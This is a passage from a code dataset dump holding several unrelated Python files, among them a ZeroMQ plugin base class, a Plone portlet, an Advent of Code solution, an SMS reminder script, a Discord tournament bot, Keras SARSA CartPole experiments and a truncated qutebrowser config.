self.zmq_context.socket(zmq.PUB)\n \"\"\"ZeroMQ producer\"\"\"\n\n self.heartbeat_interval_s = float(self.config_get(\"plugins.base.heartbeatIntervalS\"))\n \"\"\"How often in seconds this plugin should produce a heartbeat\"\"\"\n\n self.on_message_cnt = 0\n \"\"\"Number of times this plugin has received a message since starting\"\"\"\n\n self.last_received = 0\n \"\"\"Timestamp since this plugin has last received a message\"\"\"\n\n self.logger = _logger\n\n self.producer_lock = multiprocessing.Lock()\n\n self.zmq_consumer.connect(self.config_get(\"zmq.mauka.plugin.sub.interface\"))\n self.zmq_producer.connect(self.config_get(\"zmq.mauka.plugin.pub.interface\"))\n\n # Every plugin subscribes to itself to allow for plugin control\n self.subscriptions.append(name)\n\n def get_status(self) -> str:\n \"\"\" Return the status of this plugin\n :return: The status of this plugin\n \"\"\"\n return \"N/A\"\n\n def to_json(self, obj: object) -> str:\n \"\"\"Serializes the given object to json\n\n :param obj: The object to serialize\n :return: JSON representation of object\n \"\"\"\n return json.dumps(obj, cls=JSONEncoder)\n\n def from_json(self, json_str: str) -> typing.Dict:\n \"\"\"Deserialize json into dictionary\n\n :param json_str: JSON string to deserialize\n :return: Dictionary from json\n \"\"\"\n return json.loads(json_str)\n\n def get_mongo_client(self):\n \"\"\" Returns an OPQ mongo client\n\n :return: An OPQ mongo client\n \"\"\"\n mongo_host = self.config_get(\"mongo.host\")\n mongo_port = self.config_get(\"mongo.port\")\n mongo_db = self.config_get(\"mongo.db\")\n return mongo.mongo.OpqMongoClient(mongo_host, mongo_port, mongo_db)\n\n def start_heartbeat(self):\n \"\"\"\n This is a recursive function that acts as a heartbeat.\n\n This function calls itself over-and-over on a timer to produce heartbeat messages. 
The interval can be\n        configured in the configuration file.\n        """\n\n        start_after_seconds = 5.0\n\n        def heartbeat():\n            self.produce("heartbeat".encode(), "{}:{}:{}:{}".format(self.name, self.on_message_cnt, self.last_received,\n                                                                    self.get_status()).encode())\n            timer = threading.Timer(self.heartbeat_interval_s, heartbeat)\n            timer.start()\n\n        threading.Timer(start_after_seconds, heartbeat).start()\n\n    def config_get(self, key: str) -> str:\n        """Retrieves a value from the configuration dictionary\n\n        :param key: The key associated with the value we're looking to retrieve\n        :return: The value associated with the provided key\n        :raises KeyError: When key is not in the configuration\n        """\n        if key not in self.config:\n            raise KeyError("Key {} not in config".format(key))\n        else:\n            return self.config[key]\n\n    def object_id(self, oid: str) -> bson.objectid.ObjectId:\n        """Given the string representation of an object id, return an instance of an ObjectId\n\n        :param oid: The oid to encode\n        :return: ObjectId from string\n        """\n        return bson.objectid.ObjectId(oid)\n\n    def on_message(self, topic, message):\n        """This gets called when a subscriber receives a message from a topic they are subscribed to.\n\n        This should be implemented in all subclasses.\n\n        :param topic: The topic this message is associated with\n        :param message: The message contents\n        """\n        _logger.info("on_message not implemented")\n\n    def produce(self, topic, message):\n        """Produces a message with a given topic to the system\n\n        :param topic: The topic to produce this message to\n        :param message: The message to produce\n        """\n        with self.producer_lock:\n            self.zmq_producer.send_multipart((topic, message))\n\n    def is_self_message(self, topic: str) -> bool:\n        """Determines if this is a message directed at this plugin, i.e. the topic is the name of the plugin.\n\n        :param topic: Topic of the message\n        :return: If this is a self message or not\n        """\n        return topic == self.name\n\n    def handle_self_message(self, message: str):\n        """Handles a self-message\n\n        :param message: The message to handle\n        """\n        if message == "EXIT":\n            self.exit_event.set()\n\n    def _run(self):\n        """This is the run loop for this plugin process"""\n        _logger.info("Starting Mauka plugin: {}".format(self.name))\n        signal.signal(signal.SIGTERM, signal.SIG_IGN)\n        signal.signal(signal.SIGINT, signal.SIG_IGN)\n\n        for subscription in self.subscriptions:\n            self.zmq_consumer.setsockopt_string(zmq.SUBSCRIBE, subscription)\n\n        self.start_heartbeat()\n\n        while not self.exit_event.is_set():\n            data = self.zmq_consumer.recv_multipart()\n\n            if len(data) != 2:\n                _logger.error("Malformed data from ZMQ. 
Data size should = 2, but instead is {}\".format(len(data)))\n for d in data:\n _logger.error(\"{}\".format(d.decode()))\n break\n\n topic = data[0].decode()\n message = data[1]\n\n if self.is_self_message(topic):\n _logger.info(\"Receive self message\")\n self.handle_self_message(message.decode())\n else:\n # Update statistics\n self.on_message_cnt += 1\n self.last_received = time.time()\n self.on_message(topic, message)\n\n _logger.info(\"Exiting Mauka plugin: {}\".format(self.name))\n","sub_path":"mauka/plugins/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"601783287","text":"from zope.interface import Interface\nfrom zope.interface import implements\n\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\n\nfrom zope import schema\nfrom zope.formlib import form\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\n# BEGIN CUSTOM IMPORTS\n\n\n\n# END CUSTOM IMPORTS\n\nfrom Products.healthsystemportlets import healthsystemportletsMessageFactory as _\n\nfrom zope.i18nmessageid import MessageFactory\n__ = MessageFactory(\"plone\")\n\nclass Itestportlet(IPortletDataProvider):\n \"\"\"A portlet\n\n It inherits from IPortletDataProvider because for this portlet, the\n data that is being rendered and the portlet assignment itself are the\n same.\n \"\"\"\n\n# field_richtext = schema.RichText(\n# title=_(u\"richtext\"),\n# default_mime_type='text/structured',\n# output_mime_type='text/html',\n# allowed_mime_types=('text/structured', 'text/plain',),\n# default=u\"Default value\"\n# )\n\n field_textline = schema.TextLine(\n title=_(u\"string\"),\n description=_(u\"description\"),\n default=u\"5\",\n required=False\n )\n\n field_text = schema.Text(\n title=_(u\"textarea\"),\n description=_(u\"description\"),\n required=False\n )\n\n# field_list = schema.List(\n# title=_(u\"list\"),\n# description=_(u\"description\"),\n# required=False\n# )\n\n field_int = schema.Int(\n title=_(u\"integer\"),\n description=_(u\"description\"),\n required=False\n )\n\n field_choice = schema.Choice(\n title=_(u\"choice\"),\n description=_(u\"description\"),\n values=(\"item A\", \"item B\", \"item C\", \"item D\", \"item E\"),\n required=False\n )\n\n enable_header = schema.Bool(\n title=_(u\"turn on portlet header\"),\n description=_(u\"tick this box if you want to render the header.\"),\n required=False,\n default=False\n )\n\n enable_footer = schema.Bool(\n title=_(u\"turn on portlet footer\"),\n description=_(u\"tick this box if you want to render the footer.\"),\n required=False,\n default=False\n )\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n\n This is what is actually managed through the portlets UI and associated\n with columns.\n \"\"\"\n\n implements(Itestportlet)\n\n # TODO: Set default values for the configurable parameters here\n some_field = u\"\"\n\n # TODO: Add keyword parameters for configurable parameters here\n def __init__(self, field_textline=u'', field_text=u'', field_int=u'', field_choice=u'', enable_header=False, enable_footer=False):\n self.field_textline = field_textline\n self.field_text = field_text\n self.field_int = field_int\n self.field_choice = field_choice\n self.enable_header = enable_header\n self.enable_footer = enable_footer\n\n # def __init__(self):\n # pass\n\n @property\n def title(self):\n \"\"\"This property is used to give the title of the portlet 
in the\n        "manage portlets" screen.\n        """\n        return __(u"test portlet")\n\n\nclass Renderer(base.Renderer):\n    """Portlet renderer.\n\n    This is registered in configure.zcml. The referenced page template is\n    rendered, and the implicit variable 'view' will refer to an instance\n    of this class. Other methods can be added and referenced in the template.\n    """\n\n    render = ViewPageTemplateFile('testportlet.pt')\n\n\n# NOTE: If this portlet does not have any configurable parameters, you can\n# inherit from NullAddForm and remove the form_fields variable.\n\n\nclass AddForm(base.AddForm):\n    """Portlet add form.\n\n    This is registered in configure.zcml. The form_fields variable tells\n    zope.formlib which fields to display. The create() method actually\n    constructs the assignment that is being added.\n    """\n    form_fields = form.Fields(Itestportlet)\n    label = _(u"This is a Test Portlet")\n    description = _(u"This portlet is used to test functionality.")\n\n    def create(self, data):\n        return Assignment(**data)\n\n\n# NOTE: If this portlet does not have any configurable parameters, you can\n# remove this class definition and delete the editview attribute from the\n# registration in configure.zcml\n\nclass EditForm(base.EditForm):\n    """Portlet edit form.\n\n    This is registered in configure.zcml. The form_fields variable tells\n    zope.formlib which fields to display.\n    """\n    form_fields = form.Fields(Itestportlet)\n    label = _(u"This is a Test Portlet")\n    description = _(u"This portlet is used to test functionality.")\n","sub_path":"Products/healthsystemportlets/portlets/testportlet.py","file_name":"testportlet.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"109527111","text":"from pathlib import Path\npath = Path(__file__).parent / "../../input.txt"\n\ndata = []\nwith path.open("rt") as f:\n    data = f.readlines()\n\ndef bootComp(codes):\n    visitedLoc = []\n    loc = 0\n    accum = 0\n    isLoop = True\n    while not(loc in visitedLoc) and isLoop:\n        if loc == len(codes)-1:\n            isLoop = False\n\n        visitedLoc.append(loc)\n        opCode = codes[loc][:3]\n        if opCode == 'acc':\n            accum += int(codes[loc].split(" ")[1])\n            loc += 1\n        elif opCode == 'jmp':\n            loc += int(codes[loc].split(" ")[1])\n        elif opCode == 'nop':\n            loc += 1\n    return [isLoop,accum]\n\ndef changeCode(line):\n    if line[:3] == 'jmp':\n        line = "nop" + line[3:]\n    elif line[:3] == 'nop':\n        line = "jmp" + line[3:]\n    else:\n        line = ""\n    return line\n\n\nresult = [True,0]\nfor x in range(0,len(data)):\n    line = changeCode(data[x])\n    if line == "":\n        continue\n    else:\n        data[x] = line\n    result = bootComp(data)\n    if not(result[0]):\n        break\n    #change it back!\n    data[x] = changeCode(data[x])\n\nprint(result[1])","sub_path":"Day 8/Python/Part 1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"578651186","text":"import static_vars, requests, json\r\nfrom twilio.rest import Client\r\nfrom datetime import datetime, date, timedelta, time\r\nfrom pytz import timezone, datetime, tzinfo\r\n\r\n# Twilio\r\naccount_sid = static_vars.TWIL_TEST_SID\r\nauth_token = static_vars.TWIL_TEST_TOKEN\r\nclient = Client(account_sid, auth_token)\r\ncontactPhone = static_vars.MY_PHONE\r\n\r\n# Connectwise\r\nheaders = static_vars.BASE_HEADERS\r\n\r\n# For time conversions\r\ntoday = date.today()\r\ntoday = str(today)\r\nyesterday = date.today() - 
timedelta(1)\nyesterday = str(yesterday)\nfmt = '%H:%M' \ntranslation_table = dict.fromkeys(map(ord, 'T'), ' ')\ntranslation_table2 = dict.fromkeys(map(ord, 'Z'), ' UTC+0000')\nadelaide = timezone('Australia/Adelaide')\n\n# For JSON data\nj = 0\nurl = static_vars.BASE_URL+\"/schedule/entries?conditions=dateStart > [\"+ yesterday +\"T13:30:00Z] and dateEnd < [\"+ today +\"T13:29:59Z]&pageSize=1000\"\nresponse = requests.request(\"GET\", url, headers=headers)\njsondata = json.loads(response.text)\n\n# Connectwise query\ndef sched(): \n global j\n global member\n global ticketNumber\n global cwdatestart\n global ticketSummary\n global ticketPhone\n\n try: \n ticketNumber = jsondata[j]['objectId']\n ticketUrl = static_vars.BASE_URL+\"/service/tickets/\"+ str(ticketNumber)\n ticketResponse = requests.request(\"GET\", ticketUrl, headers=headers)\n ticketdata = json.loads(ticketResponse.text)\n ticketSummary = ticketdata['summary']\n ticketPhone = ticketdata['contactPhoneNumber']\n sitevisit = []\n member = jsondata[j]['member']['name']\n cwdatestart = jsondata[j]['dateStart']\n cwdateend = jsondata[j]['dateEnd']\n\n contactID = ticketdata['contact']['id']\n contactUrl = static_vars.BASE_URL+\"/company/contacts/\"+ str(contactID) +\"/communications\"\n contactResponse = requests.request(\"GET\", contactUrl, headers=headers)\n contactData = json.loads(contactResponse.text)\n c = 0\n while c < len(contactData):\n try: \n if 'Mobile' in contactData[c]['type']['name']:\n ticketPhone = contactData[c]['value']\n break\n else:\n c += 1\n except KeyError:\n c += 1\n continue\n cwdatestart = cwdatestart.translate(translation_table)\n cwdateend = cwdateend.translate(translation_table)\n\n cwdatestart = cwdatestart.translate(translation_table2)\n cwdateend = cwdateend.translate(translation_table2)\n \n cwdatestart = datetime.datetime.strptime(cwdatestart, \"%Y-%m-%d %H:%M:%S %Z%z\")\n cwdateend = datetime.datetime.strptime(cwdateend, \"%Y-%m-%d %H:%M:%S %Z%z\")\n\n cwdatestart = cwdatestart.astimezone(adelaide)\n cwdateend = cwdateend.astimezone(adelaide)\n except KeyError:\n sms()\n \n sms()\n\n# SMS function\ndef sms():\n global ticketNumber\n global ticketSummary\n global ticketPhone\n global cwdatestart\n global member\n global j\n \n #message = client.messages.create(\n # from_= static_vars.TWIL_PHONE,\n # body= \"Good morning, your site visit is scheduled to take place today at DATETIME with ENGINEER\",\n # to=contactPhone\n #)\n\n #print(message.sid)\n print(\"from_: Subnet Reminder Service\")\n print(\"to: \"+ ticketPhone)\n print(\"body: REMINDER: Your ticket \"+ str(ticketNumber) + \" - \" + ticketSummary + \" is scheduled for today at \"+ str(cwdatestart) + \" with \"+ member + \". Please contact 08 7127 9455 for change or cancel your appointment.\")\n j += 1\n sched()\n\nsched()","sub_path":"Building Blocks/smspoc.py","file_name":"smspoc.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"593015728","text":"#! 
/usr/bin/env python3\n\n# The MIT License (MIT)\n# Copyright (c) 2017 Levak Borok \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nimport discord\nimport asyncio\nimport sys\n\nfrom rolekeeper import RoleKeeper\n\nimport json\n\ndef get_config(path):\n try:\n with open(path, 'r') as f:\n config = json.load(f)\n return config\n except FileNotFoundError as e:\n print('ERROR while loading config.\\n{}: \"{}\"'\\\n .format(e.strerror, e.filename))\n return None\n except Exception as e:\n print('ERROR while loading config.\\n{}: line {} col {}'\\\n .format(e.msg, e.lineno, e.colno))\n return None\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n await rk.on_ready()\n\n@client.event\nasync def on_member_join(member):\n await rk.on_member_join(member)\n\n@client.event\nasync def on_message(message):\n # If message is a DM\n if type(message.author) is discord.User:\n await rk.on_dm(message)\n return\n\n is_admin = message.author.server_permissions.manage_roles\n is_ref = discord.utils.get(message.author.roles, name=rk.config['roles']['referee']) or is_admin\n is_captain_in_match = rk.is_captain_in_match(message.author, message.channel) or is_admin or is_ref\n is_streamer = discord.utils.get(message.author.roles, name=rk.config['roles']['streamer']) or is_admin\n\n if len(message.content) <= 0:\n return\n\n command = message.content.split()[0]\n args = message.content.replace(command, '', 1).strip()\n\n # ADMIN COMMANDS\n #----------------\n\n if command == '!refresh' and is_admin:\n await rk.refresh(message.author.server)\n elif command == '!create_teams' and is_admin:\n await rk.create_all_roles(message.author.server)\n\n elif command == '!wipe_teams' and is_admin:\n await rk.wipe_teams(message.author.server)\n\n elif command == '!wipe_matches' and is_admin:\n await rk.wipe_matches(message.author.server)\n\n elif command == '!wipe_messages' and is_admin:\n if len(message.channel_mentions) < 1:\n await rk.reply(message,\n 'Not enough arguments:\\n```!wipe_messages #channel```')\n else:\n await rk.wipe_messages(message, message.channel_mentions[0])\n\n elif command == '!announce' and is_admin:\n await rk.announce(args, message)\n\n elif command == '!members' and is_admin:\n await rk.export_members(args, message)\n\n # REF COMMANDS\n #--------------\n\n elif command == '!add_captain' and is_ref:\n parts = args.split()\n if len(message.mentions) == 1 and len(parts) >= 4:\n 
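# expected form: !add_captain @mention team nick group (mirrors the usage string in the reply below)\n            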
await rk.add_captain(message,\n message.author.server,\n message.mentions[0], # TODO check it's the first argument?\n parts[1],\n parts[2],\n parts[3])\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!add_captain @xxx team nick group```')\n\n elif command == '!remove_captain' and is_ref:\n if len(message.mentions) == 1:\n await rk.remove_captain(message,\n message.author.server,\n message.mentions[0])\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!remove_captain @xxx```')\n\n elif command == '!bo1' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO1)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo1 @xxx @yyy```')\n\n elif command == '!bo2' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO2)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo2 @xxx @yyy```')\n\n elif command == '!bo3' and is_ref:\n if len(message.role_mentions) == 2:\n await rk.matchup(message,\n message.author.server,\n message.role_mentions[0],\n message.role_mentions[1],\n mode=RoleKeeper.MATCH_BO3)\n else:\n await rk.reply(message,\n 'Too much or not enough arguments:\\n```!bo3 @xxx @yyy```')\n\n elif command == '!say' and is_ref:\n parts = args.split()\n if len(parts) <= 1:\n await rk.reply(message,\n 'Not enough arguments:\\n```!say #channel message...```')\n else:\n channel_id = parts[0]\n if channel_id.startswith('<'):\n channel_id = channel_id[2:-1]\n channel = discord.utils.get(message.author.server.channels, id=channel_id)\n else:\n channel = discord.utils.get(message.author.server.channels, name=channel_id)\n\n if channel:\n msg = args.replace(parts[0], '', 1)\n try:\n await rk.client.send_message(channel, msg)\n except:\n await rk.reply(message,\n 'I do not see channel `#{}`'.format(channel.name))\n else:\n await rk.reply(message,\n 'No channel named `#{}`'.format(channel_id))\n\n\n # CAPTAIN COMMANDS\n #-------------------\n\n\n elif command == '!ban' and is_captain_in_match:\n await rk.ban_map(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n elif command == '!pick' and is_captain_in_match:\n await rk.pick_map(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n elif command == '!side' and is_captain_in_match:\n await rk.choose_side(message.author,\n message.channel,\n args.split()[0] if len(args) > 0 else '',\n force=is_ref)\n\n # STREAMER COMMANDS\n #-------------------\n\n elif command == '!stream' and is_streamer:\n await rk.stream_match(message,\n args.split()[0] if len(args) > 0 else '')\n\nif __name__ == '__main__':\n\n config = None\n\n if len(sys.argv) > 1:\n config = get_config(sys.argv[1])\n else:\n print('Using default configuration file path: `config.json`')\n config = get_config('config.json')\n\n if config:\n rk = RoleKeeper(client, config)\n client.run(config['app_bot_token'])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"309338870","text":"def main():\n tc = int(input())\n for t in range(tc):\n line = list(map(int, input().split()))\n A_P = line[0]\n B_Q = line[1]\n B_R = 
line[2]\n B_S = line[3]\n W = line[4]\n A_total = A_P * W\n B_total = 0\n if W <= B_R:\n B_total = B_Q\n else:\n W_tmp = W - B_R\n B_total = W_tmp * B_S + B_Q\n\n ans = 0\n if A_total < B_total:\n ans = A_total\n else:\n ans = B_total\n\n print(\"#\"+str(t+1), ans)\n\nif __name__ == '__main__':\n main()\n","sub_path":"D2/D2_1284_수도_요금_경쟁.py","file_name":"D2_1284_수도_요금_경쟁.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"296130074","text":"#Importing the necessary plotting libraries\nimport numpy as np\nimport gym\nfrom keras.layers import Dense, Flatten, Activation\nfrom keras.models import Sequential\nfrom keras.optimizers import Adam\nfrom keras.models import Model\nfrom keras.utils.vis_utils import plot_model\nfrom rl.agents import SARSAAgent\nfrom rl.policy import EpsGreedyQPolicy\nfrom rl.callbacks import TrainEpisodeLogger\nfrom keras.layers.merge import concatenate\nfrom keras.layers import Input\nfrom rl.callbacks import ModelIntervalCheckpoint, FileLogger\nimport json\n\n\n#Setting up the environment\nenv = gym.make('CartPole-v1')\nseed_val = 456\nenv.seed(seed_val)\nnp.random.seed(seed_val)\nlog_dir='log/'\nalgo='SARSA'\n\n\n#Getting the state and action space\nstates = env.observation_space.shape[0]\nactions = env.action_space.n\n\n#Callback for storing training data\ndef build_callbacks(filename):\n #checkpoint_weights_filename = 'dqn_' + env_name + '_weights_{step}.h5f'\n #callbacks = [ModelIntervalCheckpoint(checkpoint_weights_filename, interval=5000)]\n \n log_filename = filename+'_train.json'\n callbacks = [FileLogger(log_filename, interval=100)]\n return callbacks\n\n#Defining a Neural Network function for our Cartpole agent \ndef agent0(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2)) \n outputs=Dense(actions,activation='linear')(D_3)\n \n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent0.png')\n return model\n\ndef agent1(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(24, activation='relu')(fin_1))\n D_22=(Dense(24, activation='relu')(D_11))\n D_33=(Dense(24, activation='relu')(D_22))\n out2=D_33\n\n\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent1.png')\n return model\n\ndef agent2(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(12, activation='relu')(fin_1)\n D_2=(Dense(12, activation='relu')(D_1))\n D_3=(Dense(12, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(12, activation='relu')(fin_1))\n D_22=(Dense(12, activation='relu')(D_11))\n D_33=(Dense(12, activation='relu')(D_22))\n out2=D_33\n\n\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2])\n 
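# the two parallel 12-unit towers are fused here; a single linear layer then maps the merged features to one Q-value per action\n    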
outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent2.png')\n return model\n\ndef agent3(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(24, activation='relu')(fin_1)\n D_2=(Dense(24, activation='relu')(D_1))\n D_3=(Dense(24, activation='relu')(D_2))\n \n out1=D_3\n \n D_11=(Dense(24, activation='relu')(fin_1))\n D_22=(Dense(24, activation='relu')(D_11))\n D_33=(Dense(24, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(24, activation='relu')(fin_1))\n D_222=(Dense(24, activation='relu')(D_111))\n D_333=(Dense(24, activation='relu')(D_222))\n out3=D_333\n \n\n merged=concatenate([out1,out2,out3])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent3.png')\n return model\n\ndef agent4(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(8, activation='relu')(fin_1)\n D_2=(Dense(8, activation='relu')(D_1))\n D_3=(Dense(8, activation='relu')(D_2))\n #out1=(Dense(actions, activation='linear')(D_3))\n out1=D_3\n \n D_11=(Dense(8, activation='relu')(fin_1))\n D_22=(Dense(8, activation='relu')(D_11))\n D_33=(Dense(8, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(8, activation='relu')(fin_1))\n D_222=(Dense(8, activation='relu')(D_111))\n D_333=(Dense(8, activation='relu')(D_222))\n out3=D_333\n #out2=(Dense(actions, activation='linear')(D_33))\n\n merged=concatenate([out1,out2,out3])\n dense2=Dense(4,activation='relu')(merged)\n outputs=Dense(actions,activation='linear')(merged)\n \n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent4.png')\n return model\n\ndef agent5(states, actions):\n \"\"\"Creating a simple Deep Neural Network.\"\"\"\n\n in_1=Input(shape = (1, states))\n fin_1=Flatten()(in_1)\n D_1=Dense(4, activation='relu')(fin_1)\n D_2=(Dense(4, activation='relu')(D_1))\n D_3=(Dense(4, activation='relu')(D_2))\n out1=D_3\n \n D_11=(Dense(4, activation='relu')(fin_1))\n D_22=(Dense(4, activation='relu')(D_11))\n D_33=(Dense(4, activation='relu')(D_22))\n out2=D_33\n\n D_111=(Dense(4, activation='relu')(fin_1))\n D_222=(Dense(4, activation='relu')(D_111))\n D_333=(Dense(4, activation='relu')(D_222))\n out3=D_333\n \n\n merged=concatenate([out1,out2,out3])\n outputs=Dense(actions,activation='linear')(merged)\n model=Model(inputs=in_1,outputs=outputs)\n plot_model(model,show_shapes=True, to_file='models/agent5.png')\n return model\n \n\n\narchs=[ agent0, agent1,agent2,agent3,agent4,agent5]\nmodel_names=['agent0','agent1','agent2','agent3','agent4','agent5']\nfor i in range(len(archs)):\n arch=archs[i]\n model_name=model_names[i]\n filename=log_dir+algo+'_'+model_name\n model_name=0\n #Getting our neural network\n model = arch(states, actions)\n #Defining SARSA Keras-RL agent: inputing the policy and the model\n model = SARSAAgent(model=model, nb_actions=actions, policy=EpsGreedyQPolicy())\n #Compiling SARSA with mean squared error loss\n model.compile('adam', metrics=[\"mse\"])\n callbacks = build_callbacks(filename)\n #Training the agent for 50000 steps\n x=model.fit(env, nb_steps=50000, visualize=False, verbose=1,callbacks=callbacks)\n #Testing\n test_scores = model.test(env, nb_episodes = 1000, visualize= False)\n\n with 
open(filename+'_test.json', 'w') as fp:\n json.dump(test_scores.history, fp)\n\n","sub_path":"Stacking/cartpole-experiments/SARSA.py","file_name":"SARSA.py","file_ext":"py","file_size_in_byte":6791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"2496997","text":"import subprocess\nconfig.load_autoconfig()\n# exec(open(\"/home/ll/.bin/mm.py\").read())\n\nc.spellcheck.languages = ['en-GB']\nc.auto_save.session = True\nc.completion.cmd_history_max_items = 1000\nc.completion.scrollbar.padding = 0\nc.content.headers.accept_language = \"en-GB,en,en-US\"\nc.content.notifications = True \n# c.content.user_stylesheets = [\"styles/style2.css\"]\n# config.set(\"colors.webpage.darkmode.enabled\", True)\nc.downloads.open_dispatcher = \"xdg-open\"\nc.downloads.position = \"bottom\"\nc.input.insert_mode.auto_load = False\nc.messages.timeout = 3000\nc.editor.command = [\"st\", \"-e\", \"nvim\", \"{}\"]\nc.prompt.radius = 0\n# c.scrolling.bar = \"never\"\nc.scrolling.bar = \"always\"\nc.scrolling.smooth = True\nc.statusbar.padding = {\"top\": 0, \"right\": 0, \"bottom\": 0, \"left\": 0}\nc.statusbar.widgets = [\"url\", \"scroll_raw\", \"progress\"]\nc.tabs.background = True\n#c.tabs.favicons.scale = 2\n#c.tabs.indicator.padding = {\"top\": 0, \"right\": 0, \"bottom\": 0, \"left\": 0}\nc.tabs.position = \"top\"\nc.tabs.show = \"always\"\n# c.tabs.show_switching_delay = 2000\n# c.tabs.title.format = \"\"\n# c.tabs.title.format_pinned = c.tabs.title.format\n# c.tabs.width = 24\n# c.tabs.indicator.width = 0\nc.tabs.padding = {\"top\": 3, \"right\": 3, \"bottom\": 3, \"left\": 3}\nc.url.start_pages = \"about:blank\"\nc.url.default_page = \"https://www.google.com\"\nc.downloads.location.prompt = False\nc.content.geolocation = False\nc.content.ssl_strict = True\n#c.downloads.remove_finished = 800\nc.hints.dictionary = \"/usr/share/dict/british\"\nc.url.searchengines = {\"DEFAULT\": \"https://google.com/search?&q={}\",\n\"dd\": \"https://www.duckduckgo.com/?q={}\",\n\"ddi\": \"https://duckduckgo.com/?q={}&iar=images\",\n\"ggi\": \"https://www.google.co.uk/search?q={}&tbm=isch\",\n\"w\": \"https://en.wikipedia.org/w/index.php?search={}\",\n\"st\": \"http://store.steampowered.com/search/?term={}\",\n\"g\": \"https://www.google.com/search?q={}\",\n\"gi\": \"https://www.google.com/search?q={}&tbm=isch\",\n\"mw\": \"http://en.uesp.net/w/index.php?title=Special%3ASearch&search={}\",\n\"aur\": \"https://aur.archlinux.org/packages/?O=0&K={}\",\n\"pac\": 